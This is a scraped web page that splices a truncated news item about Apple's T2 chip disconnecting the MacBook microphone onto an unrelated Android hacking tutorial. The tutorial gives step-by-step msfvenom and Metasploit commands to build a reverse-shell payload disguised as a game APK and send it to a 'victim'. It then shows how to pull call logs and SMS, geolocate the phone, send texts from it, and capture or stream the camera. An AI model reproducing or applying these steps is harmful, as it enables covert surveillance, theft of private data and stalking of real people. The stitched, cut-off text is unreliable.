Apple's New MacBook Disconnects Microphone "Physically" When Lid is Closed

 October 31, 2018  Mohit Kumar Apple introduces a new privacy feature for all new MacBooks that "at some extent" will prevent hackers and malicious applications from eavesdropping on your conversations. Apple's custom T2 security chip in the latest MacBooks includes a new hardware feature that physically disconnects the MacBook's built-in microphone whenever the user closes the lid, the company revealed yesterday at its event at the Brooklyn Academy of Music in New York. Though the new T2 chip is already present in the 2018 MacBook Pro models launched earlier this year, this new feature got unveiled when Apple launched the new Retina MacBook Air and published a full security guide for T2 Chip yesterday. "This disconnect is implemented in hardware alone, and therefore prevents any software, even with root or kernel privileges in macOS, and even the software on the T2 chip, from engaging the microphone when the lid is closed,&qu

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit


In 2015 we were using msfpayload and msfencode tools to perform this hack but on June 8th 2015 both msfpayload and msfencode is replaced by msfvenom tool. So simply now msfvenom is an updated combination of Msfpayload and Msfencode tool
Now by using msfvenom we will create meterpreter payload for android.
Open you Kail Linux terminal and type:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.102 lport=4444 >/root/Desktop/TempleRun2.apk
Now it will automatically generate the malicious but interesting to install apk files and store it to your Kali Linux desktop.
/root/Desktop/TempleRun2.apk
Send this TempleRun2.apk file to victim mobile, as soon as they open and install it you will get access of victim android mobile.
Now we have to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
Go to your Kali Linux terminal and type: msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.102
set lport 4444
exploit
Now you are in victim android mobile from here you can do many things like:
To check whether victim mobile is rooted or not for this type following command:
check_root
Check victim’s mobile exact location type:
wlan_geolocate
it will show the exact location of victim mobile on Google maps
To download victim call logs from their mobile type:
dump_calllog
It will download and store txt file of call logs in your root directory
/root/calllog_dump.txt
To download sms dump type:
dump_sms
it will also download and store txt file of sms dump in your root directory
To send sms from hacked android mobile phone to someone else type:
send_sms -d “number of the person whom you want to send sms” -t “message you want send”
ex: send_sms -d 9599***847 -t hacked
To capture pic from victim’s mobile camera type:
webcam_list
it will provides you a list of all webcams on the victim mobile then select from the list and type:
webcam_snap 2
to stream live feed from victim’s mobile camera type:
webcam_stream
it will automatically open up a browser and you will see live feed from their camera